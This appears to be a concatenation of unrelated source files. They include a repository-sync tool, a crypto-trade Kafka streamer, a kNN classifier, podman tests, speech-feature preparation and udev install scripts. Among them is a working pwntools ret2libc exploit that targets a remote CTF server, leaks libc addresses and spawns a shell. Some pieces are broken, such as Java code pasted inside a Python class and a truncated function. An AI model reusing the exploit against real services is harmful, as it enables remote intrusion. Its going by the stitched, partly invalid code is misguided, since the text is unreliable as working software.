    angle_matrix = generate_angle_matrix(centroids, centroids)
    touch_matrix = generate_touch_matrix(labels)
    # Keep only angles between labels that actually touch.
    touch_angle_matrix = multiply_images(touch_matrix, angle_matrix)
    touch_angle_matrix = radians_to_degrees(touch_angle_matrix)
    from .._tier1 import set
    # Clear the destination before drawing the mesh lines into it.
    set(angle_mesh_destination, 0)
    angle_mesh_destination = touch_matrix_to_mesh(centroids, touch_angle_matrix, angle_mesh_destination)
    return angle_mesh_destination
|
#!/usr/bin/env python3
"""
SYNOPSIS: Automatically updates every found source code repository in the
current tree, or the specified path.
"""
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
    """Discover repositories under the target tree, resolve each remote's
    authentication requirements (probing and caching unknown ones), then
    update every repository whose credentials are available. With
    --daemon, repositories that would need user interaction are skipped.
    """
    # Go into askpass-wrapper mode if the environment specifies it.
    if 'SR_ASKPASS' in os.environ:
        from sync_repositories.credentials import auto_askpass
        auto_askpass.execute()

        # Make sure execution doesn't flow through.
        raise RuntimeError("askpass_wrapper didn't terminate properly.")

    ARGS = argparse.ArgumentParser(
        description="""Synchronise source control repositories found in the
                    current tree.""",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )

    ARGS.add_argument('root_folder',
                      help="""The root of the directory tree where update
                           should be run.""",
                      nargs='?',
                      default=os.getcwd())

    ARGS.add_argument('--do-not-ask', '--daemon', '-d',
                      dest='daemon',
                      action='store_true',
                      help="""Perform an automatic update of repositories,
                           skipping a repository if user interaction
                           would be necessary.""")

    argv = ARGS.parse_args()
    keyring = kr.SecretStorage.get_storage()

    print("Checking '%s' for repositories..." % argv.root_folder,
          file=sys.stderr)

    # Maps repository -> list of (remote, url, parts) that may be updated.
    repository_to_update_data = {}

    # Perform a check that every repository's authentication status is known.
    for repo in get_repositories(argv.root_folder):
        repo_data = list()
        for remote, url, parts in repo.get_remotes():
            check_authentication = keyring.is_requiring_authentication(*parts)
            needs_credentials, can_update = None, False
            if check_authentication is None:
                # We don't know yet whether the server requires
                # authentication or not.
                auth_checker = repo.get_auth_requirement_detector_for(
                    remote)()
                try:
                    if auth_checker.check():
                        keyring.set_authenticating(*parts)
                        needs_credentials = True
                    else:
                        keyring.set_unauthenticated(*parts)
                        needs_credentials = False
                        can_update = True
                except subprocess.CalledProcessError as cpe:
                    print("Failed to execute authentication check for "
                          "repository '%s' remote '%s':"
                          % (repo.path, remote))
                    print(cpe)
                    continue
            elif check_authentication is False:
                # We know that the server does not require authentication.
                needs_credentials, can_update = False, True
            else:
                # We know that the server requires authentication.
                needs_credentials = True

            auth_backend = repo.get_authentication_method(remote)
            if auth_backend == Backends.KEYRING:
                if needs_credentials:
                    # If we realised that credentials are needed, check if
                    # credentials are properly known.
                    credentials_stored = keyring.get_credentials(*parts)
                    if not credentials_stored:
                        print("The repository '%s' has a remote server '%s' "
                              "is connected to, but the authentication "
                              "details for this server are not known!"
                              % (repo.path, remote))
                        if not argv.daemon:
                            # ... unless running in daemon mode, in which
                            # case the user won't be asked.
                            kr.discuss_keyring_security()
                            u, p = kr.ask_user_for_password(
                                keyring, url, parts, can_be_empty=False)

                            # Check if the given credentials are valid.
                            auth_checker = repo \
                                .get_auth_requirement_detector_for(remote)(
                                    u, p)
                            if auth_checker.check_credentials():
                                can_update = True
                            else:
                                print("Invalid credentials given!",
                                      file=sys.stderr)
                                protocol, server, port, objname = parts
                                keyring.delete_credential(protocol,
                                                          server,
                                                          port,
                                                          u,
                                                          objname)
                    else:
                        can_update = True

            if can_update:
                repo_data.append((remote, url, parts))
            else:
                print("... Skipping this repository from update.")
                continue

        repository_to_update_data[repo] = repo_data

    # Update repositories that had been selected for actual update.
    print("Performing repository updates...")
    for repo, data in repository_to_update_data.items():
        for remote, url, parts in data:
            print("Updating '%s' from remote '%s'..." % (repo.path, remote))
            auth_backend = repo.get_authentication_method(remote)
            update_success = False
            if auth_backend == Backends.KEYRING:
                kr_creds = keyring.get_credentials(*parts)
                if not kr_creds:
                    # If the server doesn't require authentication, don't
                    # provide credentials.
                    kr_creds = [(None, None)]

                # Try each stored credential until one update succeeds.
                for kr_cred in kr_creds:
                    updater = repo.get_updater_for(remote)(*kr_cred)
                    update_success = update_success or updater.update()

            if not update_success:
                print("Failed to update '%s' from remote '%s'!"
                      % (repo.path, remote),
                      file=sys.stderr)


if __name__ == '__main__':
    _main()
|
"""
Lendro Arquivos CSV
CSV = Comma Separeted Values = Valores Separados por Virgula
# Possivel de se trabalhar, mas não é o ideal ( muito trabalho )
with open('original.csv', encoding='utf-8') as arquivo:
dados = arquivo.read()
dados = dados.split(',')[2:]
print(dados)
A linguagem Python possui 2 formas diferente para ler dados em arquivos CSV:
- reader -> Permite que iteremos sobre as linhas do arquivo CSV como listas
from csv import reader
with open('original.csv', encoding='utf-8') as arquivo:
leitor_csv = reader(arquivo)
next(leitor_csv) # Pular o Cabeçalho
# cada linha é uma lista
for linha in leitor_csv:
print(f'{linha[0]} nasceu no(a) {linha[1]} e mede {linha[2]} centímetros')
- DictReader -> Peremite que iteremos sobre as lonhas do arquivo CSV como OrderedDicts;
# DictReader
from csv import DictReader
with open('original.csv', encoding='utf-8') as arquivo:
leitor_csv = DictReader(arquivo)
# cada linha é um OrderedDict
for linha in leitor_csv:
print(f"{linha['Nome']} nasceu no(a) {linha['País']} e mede {linha['Altura (em cm)']} centímetros")
"""
# DictReader with a different separator
from csv import DictReader

with open('original.csv', encoding='utf-8') as arquivo:
    leitor_csv = DictReader(arquivo, delimiter=',')  # <- change here to ; or a blank space.. etc

    # each row is an OrderedDict keyed by the header names
    for linha in leitor_csv:
        print(f"{linha['Nome']} nasceu no(a) {linha['País']} e mede {linha['Altura (em cm)']} centímetros")
|
#!/home/ubuntu/archiconda3/envs/streaming/bin/python3.7
#%%
import asyncio
from binance import AsyncClient, BinanceSocketManager
from confluent_kafka import Producer
import configparser
import socket
import ast
async def main(producer):
    """Stream Binance trade events and forward each one to Kafka.

    Subscribes to a multiplexed trade socket for several EUR pairs and
    publishes every trade as a pipe-separated record on the 'crypto'
    topic. Runs until cancelled or the socket raises.
    """
    client = await AsyncClient.create()
    try:
        bm = BinanceSocketManager(client)
        # start any sockets here, i.e a trade socket
        ts = bm.multiplex_socket(['dogeeur@trade', 'btceur@trade', 'etheur@trade', 'maticeur@trade', 'linkeur@trade', 'doteur@trade', 'bnbeur@trade', 'adaeur@trade', 'icpeur@trade', 'xtzeur@trade'])
        # then start receiving messages
        async with ts as tscm:
            while True:
                res = await tscm.recv()
                # Round-trip through str()/literal_eval keeps the original
                # defensive parsing of the payload dict.
                dictionary = ast.literal_eval(str(res))
                #print(dictionary)
                csv_record = "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (
                    dictionary["stream"],
                    dictionary["data"]["E"],
                    dictionary["data"]["s"],
                    dictionary["data"]["t"],
                    dictionary["data"]["p"],
                    dictionary["data"]["q"],
                    dictionary["data"]["b"],
                    dictionary["data"]["a"],
                    dictionary["data"]["T"],
                    dictionary["data"]["m"],
                    dictionary["data"]["M"])
                producer.produce('crypto', value=csv_record)
                # NOTE: flushing per message is kept for identical delivery
                # behaviour, though it limits throughput.
                producer.flush()
    finally:
        # BUGFIX: this call was placed after the infinite receive loop and
        # therefore unreachable; close the websocket client on exit too.
        await client.close_connection()
#%%
if __name__ == "__main__":
    # Kafka producer pointed at a local broker; client id = this host name.
    conf = {'bootstrap.servers': "localhost:9092",
            'client.id': socket.gethostname()}
    producer = Producer(conf)
    # NOTE(review): asyncio.get_event_loop() for this purpose is deprecated
    # since 3.10; asyncio.run(main(producer)) is the modern equivalent.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(producer))
# %%
|
#!/usr/bin/env python3
# Copyright (c) 2021 by Apex.AI Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import os
import requests
import sys
import time
def main():
    """Trigger the Axivion GitLab pipeline for the current GitHub commit.

    Exits with status 1 if the trigger API does not answer 201 Created;
    otherwise prints the id of the newly created pipeline.
    """
    payload = {
        'token': os.environ['AXIVION_TRIGGER_TOKEN'],
        'ref': os.environ.get('AXIVION_REF_NAME', 'master'),
    }
    commit_sha = os.environ['GITHUB_SHA']
    trigger_url = (
        'https://gitlab.com/api/v4/projects/24081973/trigger/pipeline'
        f'?variables[ICEORYX_SHA]={commit_sha}'
    )
    response = requests.post(trigger_url, json=payload)
    if response.status_code != 201:
        print(f'ERROR: Pipeline trigger failed: {response.status_code}', file=sys.stderr)
        sys.exit(1)
    pipeline_id = response.json()['id']
    print(pipeline_id)


if __name__ == "__main__":
    main()
|
import time
def spin(cycles=100, delay=0.1):
    """Animate a simple text spinner on stdout.

    Parameters
    ----------
    cycles : int
        Number of full '-\\|/' rotations to show (default 100, matching
        the previously hard-coded loop count).
    delay : float
        Seconds to pause between frames (default 0.1, as before).
    """
    for _ in range(cycles):
        for ch in '-\\|/':
            print(ch, end='', flush=True)
            time.sleep(delay)
            # Backspace so the next frame overwrites this one in place.
            print('\b', end='', flush=True)


if __name__ == '__main__':
    spin()
|
# Repeatedly clicks a control button on a LAN device's web page via Selenium.
# import webdriver
from selenium import webdriver

# create webdriver object (requires Firefox + geckodriver on PATH)
driver = webdriver.Firefox()

# open the device's control page on the local network
# (the original "get geeksforgeeks.org" comment was a copy-paste leftover)
driver.get("http://192.168.4.1")

# locate the 'turnleft' button
# NOTE(review): find_element_by_id was removed in Selenium 4; the modern call
# is driver.find_element(By.ID, "turnleft") — confirm the installed version.
element = driver.find_element_by_id("turnleft")

# Click forever; stop the script with Ctrl+C.
while True:
    # click the element
    element.click()
|
# -*- coding:utf-8 -*-
import numpy as np
from matplotlib.font_manager import FontProperties
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
from IPython.core.pylabtools import figsize
import operator
"""
函数说明:kNN算法,分类器
Parameters:
inX-用于分类的数据(测试集)
dataSet-用于训练的数据(训练集)
labels-分类标签
k-kNN算法参数,选择距离最小的k个点
returns:
sortedClassCount[0][0]-分类结果
"""
def classify0(inX,dataSet,labels,k):
    """Classify *inX* with a k-nearest-neighbours vote over *dataSet*.

    Parameters
    ----------
    inX : array-like
        Feature vector to classify.
    dataSet : np.ndarray
        Training feature matrix, one row per sample.
    labels : sequence
        Class label for each training row.
    k : int
        Number of nearest neighbours that vote.

    Returns
    -------
    The label with the most votes among the k nearest training samples
    (ties resolved by first occurrence, as before).
    """
    # Euclidean distance from inX to every training row; broadcasting
    # replaces the original explicit np.tile copy.
    deltas = dataSet - np.asarray(inX)
    distances = np.sqrt((deltas ** 2).sum(axis=1))
    # Training-row indices ordered from nearest to farthest.
    nearest = distances.argsort()
    # Tally the labels of the k closest samples.
    votes = {}
    for idx in nearest[:k]:
        label = labels[idx]
        votes[label] = votes.get(label, 0) + 1
    # Highest count wins; sorted() is stable, so ties keep first-seen
    # order exactly like the original implementation.
    ranked = sorted(votes.items(), key=operator.itemgetter(1), reverse=True)
    return ranked[0][0]
"""
函数说明:打开并解析文件,对数据进行分类:1代表不喜欢,2代表魅力一般,3极具魅力
parameters:
filename:文件名
Returns:
returnMat:特征矩阵
classLableVector-分类Label向量
"""
def file2matrix(filename):
#打开文件
fr=open(filename)
#读取文件所有内容
arrayOLines=fr.readlines()
#得到文件行数
numberOfLines=len(arrayOLines)
#返回的NumPy矩阵,解析完成的数据:arrayOLines列,3列
returnMat=np.zeros((numberOfLines,3))
#返回的分类标签向量
classLabelVector=[]
#行的索引值
index=0
#
for line in arrayOLines:
#删除字符串中的空白符号
line=line.strip()
#根据“\t”进行字符串分割
listFormLine=line.split('\t')
#将数据前三列提取出来,存放到returnMat的NumPy矩阵中,也就是特征矩阵
returnMat[index,:]=listFormLine[0:3]
#根据文本标记进行分类,1--不喜欢,2--魅力一般,3--极具魅力
if listFormLine[-1]=='didntLike':
classLabelVector.append(1)
elif listFormLine[-1]=='smallDoses':
classLabelVector.append(2)
elif listFormLine[-1]=='largeDoses':
classLabelVector.append(3)
index+=1
return returnMat,classLabelVector
"""
函数说明:数据可视化
parameters:
datingDataMat:特征矩阵
classLableVector-分类Label向量
Returns:
无
"""
def showdatas(datingDataMat,datingLabels):
    """Visualise the dating data as three pairwise scatter plots coloured by class label."""
    # Font able to render the Chinese titles/labels (Windows SimSun).
    font=FontProperties(fname=r"c:\windows\fonts\simsun.ttc",size=14)
    # 2x2 canvas with independent x/y axes; axs[0][0] is the top-left region.
    fig,axs=plt.subplots(nrows=2, ncols=2, sharex=False, sharey=False,
        figsize=(13,13))
    numberOfLabels=len(datingLabels)
    # Map class labels 1/2/3 to black/orange/red, one colour per sample.
    LabelsColors=[]
    for i in datingLabels:
        if i == 1:
            LabelsColors.append('black')
        if i == 2:
            LabelsColors.append('orange')
        if i == 3:
            LabelsColors.append('red')
    # Scatter of columns 0 vs 1 (flight miles vs gaming time), size 15, alpha 0.5.
    # NOTE(review): matplotlib's documented keyword is lowercase 'fontproperties';
    # the capitalised 'FontProperties=' form below may fail on recent versions — confirm.
    axs[0][0].scatter(x=datingDataMat[:,0],y=datingDataMat[:,1],color=LabelsColors,s=15,alpha=.5)
    axs0_title_text=axs[0][0].set_title('每年获得的飞行常客里程数与玩视频游戏所消耗时间占比',FontProperties=font)
    axs0_xlabel_text=axs[0][0].set_xlabel('每年获得的飞行常客里程数',FontProperties=font)
    axs0_ylabel_text=axs[0][0].set_ylabel('玩视频游戏所消耗时间占',FontProperties=font)
    plt.setp(axs0_title_text,size=9,weight='bold',color='red')
    plt.setp(axs0_xlabel_text,size=7,weight='bold',color='black')
    plt.setp(axs0_ylabel_text,size=7,weight='bold',color='black')
    # Scatter of columns 0 vs 2 (flight miles vs ice-cream litres).
    axs[0][1].scatter(x=datingDataMat[:,0],y=datingDataMat[:,2],color=LabelsColors,s=15,alpha=.5)
    axs1_title_text=axs[0][1].set_title('每年获得的飞行常客里程数与每周消费的冰激淋公升数',FontProperties=font)
    axs1_xlabel_text=axs[0][1].set_xlabel('每年获得的飞行常客里程数',FontProperties=font)
    axs1_ylabel_text=axs[0][1].set_ylabel('每周消费的冰激淋公升数',FontProperties=font)
    plt.setp(axs1_title_text,size=9,weight='bold',color='red')
    plt.setp(axs1_xlabel_text,size=7,weight='bold',color='black')
    plt.setp(axs1_ylabel_text,size=7,weight='bold',color='black')
    # Scatter of columns 1 vs 2 (gaming time vs ice-cream litres).
    axs[1][0].scatter(x=datingDataMat[:,1],y=datingDataMat[:,2],color=LabelsColors,s=15,alpha=.5)
    axs2_title_text=axs[1][0].set_title('玩视频游戏所消耗时间占比与每周消费的冰激淋公升数',FontProperties=font)
    axs2_xlabel_text=axs[1][0].set_xlabel('玩视频游戏所消耗时间占比',FontProperties=font)
    axs2_ylabel_text=axs[1][0].set_ylabel('每周消费的冰激淋公升数',FontProperties=font)
    plt.setp(axs2_title_text,size=9,weight='bold',color='red')
    plt.setp(axs2_xlabel_text,size=7,weight='bold',color='black')
    plt.setp(axs2_ylabel_text,size=7,weight='bold',color='black')
    # Legend proxies: one dummy Line2D per class, matching the scatter colours.
    didntLike=mlines.Line2D([],[],color='black',marker='.',markersize=6,label='didntLike')
    smallDoses=mlines.Line2D([],[],color='orange',marker='.',markersize=6,label='smallDoses')
    largeDoses=mlines.Line2D([],[],color='red',marker='.',markersize=6,label='largeDoses')
    # Attach the legend to each populated subplot (axs[1][1] is intentionally empty).
    axs[0][0].legend(handles=[didntLike,smallDoses,largeDoses])
    axs[0][1].legend(handles=[didntLike,smallDoses,largeDoses])
    axs[1][0].legend(handles=[didntLike,smallDoses,largeDoses])
    # Blocks until the figure window is closed.
    plt.show()
"""
函数说明:对数据进行归一化
parameters:
dataSet:特征矩阵
Returns:
normDataSet:归一化后的特征矩阵
ranges:数据范围
minVals:数据最小值
"""
def autoNorm(dataSet):
    """Min-max normalise every column of dataSet into the range [0, 1].

    Parameters:
        dataSet: 2-D numpy array of raw feature values (rows = samples).
    Returns:
        normDataSet: array of the same shape, scaled per column.
        ranges: per-column (max - min) spread.
        minVals: per-column minimum values.
    """
    # min(0)/max(0) reduce over rows, giving one value per column.
    minVals = dataSet.min(0)
    maxVals = dataSet.max(0)
    ranges = maxVals - minVals
    # Broadcasting applies the per-column shift and scale to every row; this
    # replaces the original np.tile copies and a dead np.zeros allocation.
    normDataSet = (dataSet - minVals) / ranges
    return normDataSet, ranges, minVals
def datingClassTest():
    """Hold-out evaluation of the kNN classifier: train on 90% of the data, test on 10%."""
    datingDataMat,datingLabels=file2matrix("datingTestSet.txt")
    # Fraction of the data reserved as the test split.
    hoRatio=0.10
    # Normalise features so each column contributes equally to the distance.
    normDataSet,ranges,minVals=autoNorm(datingDataMat)
    m=normDataSet.shape[0]
    # The first numTestVecs rows are test samples; the rest are training data.
    numTestVecs=int(m*hoRatio)
    errorCount=0.0
    for i in range(numTestVecs):
        # k-NN classification with k=4 against the training portion.
        classifierResult=classify0(normDataSet[i,:], normDataSet[numTestVecs:m,:], datingLabels[numTestVecs:m], 4)
        # (The printed string contains a typo, 真是 for 真实; left unchanged as runtime output.)
        print("分类结果:%d\t真是类别:%d"%(classifierResult,datingLabels[i]))
        if classifierResult!=datingLabels[i]:
            errorCount+=1.0
    # Report the hold-out error rate as a percentage.
    print("错误率:%f%%"%(errorCount/float(numTestVecs)*100))
if __name__=='__main__':
    # Visualisation / normalisation experiments kept for reference:
    # datingDataMat,datingLabels=file2matrix("datingTestSet.txt")
    # showdatas(datingDataMat, datingLabels)
    # normDataSet,ranges,minVals=autoNorm(datingDataMat)
    # print(normDataSet)
    # print(ranges)
    # print(minVals)
    # Run the hold-out accuracy test when executed as a script.
    datingClassTest()
# NOTE(review): this block is Java (Spring @Bean configuration) pasted under a
# Python-style class header; it is not valid Python or Java as written.
# Left byte-identical — it needs to be ported, not patched.
class PersistenceConfiguration(JdbcConfiguration):
    # @Bean
    # NamedParameterJdbcOperations operations() {
    #     return new NamedParameterJdbcTemplate(dataSource());
    # }
    #
    # @Bean
    # PlatformTransactionManager transactionManager() {
    #     return new DataSourceTransactionManager(dataSource());
    # }
    @Bean
    DataSource dataSource(){
        return new EmbeddedDatabaseBuilder()
                .setName( "obops" )
                .setType( EmbeddedDatabaseType.HSQL )
                .addScript( "rmq-message-broker-schema.sql" )
                .build();
    }
}
|
# Load the poker hands: one round per line, ten space-separated cards,
# the first five for player 1 and the last five for player 2.
# 'with' closes the file deterministically; the original leaked the handle.
# (A trailing newline in the file leaves one empty entry at the end of 'rounds'.)
with open("poker.txt", 'r') as f:
    rounds = f.read().split('\n')
cards = [a.split(' ') for a in rounds]
player1 = [c[0:5] for c in cards]
player2 = [c[5:10] for c in cards]
def cardsplit(card):
    """Map a two-character card code such as 'AS' to a (rank, suit) pair of ints."""
    rank_of = {'2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7,
               '8': 8, '9': 9, 'T': 10, 'J': 11, 'Q': 12, 'K': 13, 'A': 14}
    suit_of = {'C': 0, 'D': 1, 'H': 2, 'S': 3}
    rank, suit = card[0], card[1]
    return (rank_of[rank], suit_of[suit])
# Smoke test: show the parsed first hand. print() with a single argument
# behaves identically under Python 2 and 3; the bare print statement used
# before was a SyntaxError on Python 3.
for x in player1[0]:
    print(cardsplit(x))
# import this
# Beginner tutorial script exercising basic Python: printing, arithmetic,
# conditionals, lists, dicts, slicing and loops.
print("file works")
print("2 * 2 =", 2*2)
year = 2020
birthyear = 2000
month = "July"
print(month, year)
print("you are", year-birthyear)
my_float = 2.4
# str(8) + str(int('7')) concatenates the strings "8" and "7" -> "87".
print(str(8) + str(int('7')))
num = 2
if num < 4:
    print("smaller")
# Lists may mix types; dict keys may mix types too.
a_list = ["item1", "item2", 60]
b_list = [60, 62, 61]
a_map = {"key":"value", 6:"six"}
print("list:")
print(a_map["key"])
print(a_map[6])
# Only b_list is sorted: a_list mixes str and int, which cannot be compared.
b_list.sort() # or sorted(a_list)
# Out-of-range slices are safe: [:100] is the whole list, [100:] is empty.
print(a_list[:100])
print(a_list[100:])
print(a_list[-1])
print(60 in a_list)
for i in range(0, 4):
    print(i);
import unittest
from varlink import (Client, VarlinkError)
# Socket for the podman varlink service.
address = "unix:/run/podman/io.projectatomic.podman"
# NOTE(review): created at import time, so merely importing this test module
# requires a reachable podman varlink socket.
client = Client(address=address)
def runErrorTest(tfunc):
    """Return True iff calling *tfunc* raises a VarlinkError whose code is
    org.varlink.service.MethodNotImplemented; False when no such error occurs."""
    expected = "org.varlink.service.MethodNotImplemented"
    try:
        tfunc()
    except VarlinkError as err:
        return err.error() == expected
    else:
        return False
class ImagesAPI(unittest.TestCase):
    """Every image endpoint is expected to be unimplemented on the server;
    each test asserts that calling it raises MethodNotImplemented."""
    def test_ListImages(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.ListImages))
    def test_BuildImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.BuildImage))
    def test_CreateImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.CreateImage))
    def test_InspectImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.InspectImage))
    def test_HistoryImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.HistoryImage))
    def test_PushImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.PushImage))
    def test_TagImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.TagImage))
    def test_RemoveImage(self):
        podman = client.open("io.projectatomic.podman")
        # Fixed copy-paste bug: this test previously exercised TagImage again,
        # leaving RemoveImage uncovered.
        self.assertTrue(runErrorTest(podman.RemoveImage))
    def test_SearchImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.SearchImage))
    def test_DeleteUnusedImages(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.DeleteUnusedImages))
    def test_CreateFromContainer(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.CreateFromContainer))
    def test_ImportImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.ImportImage))
    def test_ExportImage(self):
        podman = client.open("io.projectatomic.podman")
        self.assertTrue(runErrorTest(podman.ExportImage))
if __name__ == '__main__':
    # Discover and run all TestCase classes in this module.
    unittest.main()
|
import os
import numpy as np
import glob
import echo_canc_lib as ec

# Build train/test MFCC feature matrices (with left/right context frames) and
# frame-level labels for the 'us' keyword-spotting data set, then save them
# as a single .npz archive.
label = 'us/'
path_label = "./data/" + label + "label/"
path_mfcc = "./data/" + label + "feature/"
path_feature = "./data/" + label + "feature/final/"
left_context = 3
right_context = 3
# 39 MFCC coefficients per frame, stacked across the whole context window.
feature_train = np.empty((0, 39*(left_context + right_context + 1)))
feature_test = np.empty((0, 39*(left_context + right_context + 1)))
label_train = np.empty((0, 1))
label_test = np.empty((0, 1))
id_test = np.empty((0, 1))
filename_test = []
print(path_label + label[0:-1] + '_refined')
with open(path_label + label[0:-1] + '_refined') as f:
    k = 1
    prev_file = '__'
    prev_label = []
    prev_feat = []
    for line in f:
        # Every 10th processed utterance goes to the test split.
        if np.mod(k, 10) == 0:
            test = 1
            train = 0
        else:
            test = 0
            train = 1
        # Label line layout: filename, (tag, start, end)*, total_frame
        line_split = line.split(',')
        filename = line_split[0]
        start_frame = {}
        end_frame = {}
        m = 1
        for j in range(int(len(line_split)/2 - 1)):
            if line_split[m] == 'us':
                start_frame[j] = line_split[m + 1]
                end_frame[j] = line_split[m + 2]
                m += 3
        total_frame = line_split[-1]
        # Use a distinct name for the per-utterance MFCC file: the original
        # rebound the outer label-file handle 'f' while it was being iterated.
        with open(path_mfcc + filename, 'r') as mfcc_file:
            mfcc_lines = mfcc_file.readlines()
            rows = [row_line.split() for row_line in mfcc_lines]
            rows = np.asarray(rows)
            # np.float was removed in NumPy 1.24; the builtin float is the
            # documented equivalent (float64).
            mfcc_ = rows.astype(float)
        num_data, num_feat = np.shape(mfcc_)
        num_data = int(num_data)
        total_frame = int(total_frame)
        # Trust the MFCC file's actual frame count over the label file's.
        # (The original re-checked the same condition afterwards; that branch
        # was unreachable and has been removed.)
        if num_data != total_frame:
            total_frame = num_data
        if len(start_frame) == 0:
            continue
        else:
            print('processing: ', filename, '...')
        k += 1
        feature_temp = ec.get_feature_new(mfcc_, left_context, right_context)
        label_temp = ec.get_label_new(start_frame, end_frame, total_frame, left_context, right_context)
        if train:
            feature_train = np.concatenate((feature_train, feature_temp), axis=0)
            label_train = np.concatenate((label_train, label_temp), axis=0)
        elif test:
            feature_test = np.concatenate((feature_test, feature_temp), axis=0)
            label_test = np.concatenate((label_test, label_temp), axis=0)
            # Utterance-boundary markers: +1 at the first kept frame, -1 at the last.
            id_test_temp = np.zeros((num_data, 1))
            # Trims 4 leading / 3 trailing frames — presumably the context
            # frames dropped by get_feature_new; TODO confirm against ec.
            id_test_temp = id_test_temp[4:-3]
            id_test_temp[0] = 1
            id_test_temp[-1] = -1
            id_test = np.concatenate((id_test, id_test_temp), axis=0)
            filename_test = np.append(filename_test, filename)
        if k > 2000:
            break
if not os.path.exists(path_feature):
    os.makedirs(path_feature)
np.savez(path_feature + label[0:-1] + '.npz', feature_train=feature_train, label_train=label_train,
         feature_test=feature_test, label_test=label_test, id_test=id_test,
         filename_test=filename_test)
# Class-balance report for both splits (0 = filler, 1 = keyword).
idx_0 = np.where(label_train == 0)[0]
idx_1 = np.where(label_train == 1)[0]
print('filler:', len(idx_0))
print('keyword:', len(idx_1))
idx_0 = np.where(label_test == 0)[0]
idx_1 = np.where(label_test == 1)[0]
print('filler t:', len(idx_0))
print('keyword t:', len(idx_1))
|
from pwn import *
# ret2libc exploit: leak write@got, compute the libc base from the known
# write offset, then return into system("/bin/sh").
#p=process("./level3")
p=remote('111.200.241.244',48932)
elf=ELF("./level3")
libc=ELF('./libc_32.so.6')
# Offsets inside the provided libc: write-to-system delta and
# write-to-"/bin/sh" delta (0x0015902b is the /bin/sh string offset).
sys_r_write=libc.sym['write']-libc.sym['system']
bash_r_write=libc.sym['write']-0x0015902b
# Stage 1: overflow (0x8c bytes to the saved return address), call
# write(1, write@got, 10) to leak the address, then return to main.
# NOTE(review): str + p32(...) concatenation only works under Python 2
# pwntools, where p32 returns str; on Python 3 these payloads must be bytes.
payload='a'*0x8c+p32(elf.plt['write'])+p32(elf.sym['main'])+p32(1)+p32(elf.got['write'])+p32(10)
p.sendlineafter("Input:\n",payload)
# First 4 leaked bytes are the runtime address of write().
a_write=u32(p.recv()[:4])
a_sys=a_write-sys_r_write
a_bash=a_write-bash_r_write
# Stage 2: overflow again and call system("/bin/sh"); the 'a'*4 is the
# fake return address for system.
payload2='a'*0x8c+p32(a_sys)+'a'*4+p32(a_bash)
p.sendlineafter("Input:\n",payload2)
p.interactive()
|
from django.db import models
# Model: DailyMemo — a dated note with a title, body and an integer "value" score.
class DailyMemo(models.Model):
    # Calendar date of the memo.
    date = models.DateField(verbose_name='日期')
    # Time of day of the memo.
    time = models.TimeField(verbose_name='时间')
    # Short title, at most 100 characters.
    title = models.CharField(verbose_name='标题', max_length=100)
    # Free-form memo body.
    content = models.TextField(verbose_name='内容')
    # Integer worth/priority assigned by the user.
    value = models.IntegerField(verbose_name='价值')
# END
|
from walrus_system_configuration.util import *
from catkin.find_in_workspaces import find_in_workspaces
import os
UDEV_RULES_DIR = '/etc/udev/rules.d'
def enumerate_udev_files():
    """Collect the paths of every udev rules file that should be installed.

    Returns a list of absolute file paths. On failure an error is reported
    and an empty list is returned — the original returned None implicitly,
    which made callers' ``for f in enumerate_udev_files()`` raise TypeError.
    """
    udev_path_list = find_in_workspaces(project='walrus_system_configuration', path='udev', first_matching_workspace_only=True)
    if len(udev_path_list) == 0:
        error('Could not locate walrus udev rules to install')
        return []
    udev_path = udev_path_list[0]
    udev_files = [os.path.join(udev_path, f) for f in os.listdir(udev_path)]
    # The epos_hardware package ships one extra rules file we also install.
    epos_udev_file_list = find_in_workspaces(project='epos_hardware', path='90-ftd2xx.rules', first_matching_workspace_only=True)
    if len(epos_udev_file_list) == 0:
        error('Could not locate epos udev rules to install')
        return []
    udev_files.append(epos_udev_file_list[0])
    return udev_files
def install():
    """Symlink each required udev rules file into /etc/udev/rules.d, prompting before changes."""
    log('Installing udev rules')
    # 'or []' guards against enumerate_udev_files() returning None on error.
    for f in enumerate_udev_files() or []:
        name = os.path.basename(f)
        installed_udev_file = os.path.join(UDEV_RULES_DIR, name)
        if os.path.isfile(installed_udev_file):
            # A file exists; it is correct only if it is a symlink back to our copy.
            if os.path.realpath(installed_udev_file) != f:
                error(name + ' already exists, but is not correct')
                if confirm('Backup old file and install ' + name):
                    sudo_mv(installed_udev_file, installed_udev_file+'~')
                    sudo_symlink(f, installed_udev_file)
            else:
                success(name + ' already installed')
        else:
            warn(name + ' does not exist')
            if confirm('Install ' + name + '?'):
                log('Installing: ' + name)
                sudo_symlink(f, installed_udev_file)
def status():
    """Report the installation state of each expected udev rules file."""
    log('udev rules')
    # The original re-resolved the rules directory here and built an unused
    # udev_file_names list; enumerate_udev_files() already does the lookup
    # and reports errors, so the dead locals were removed.
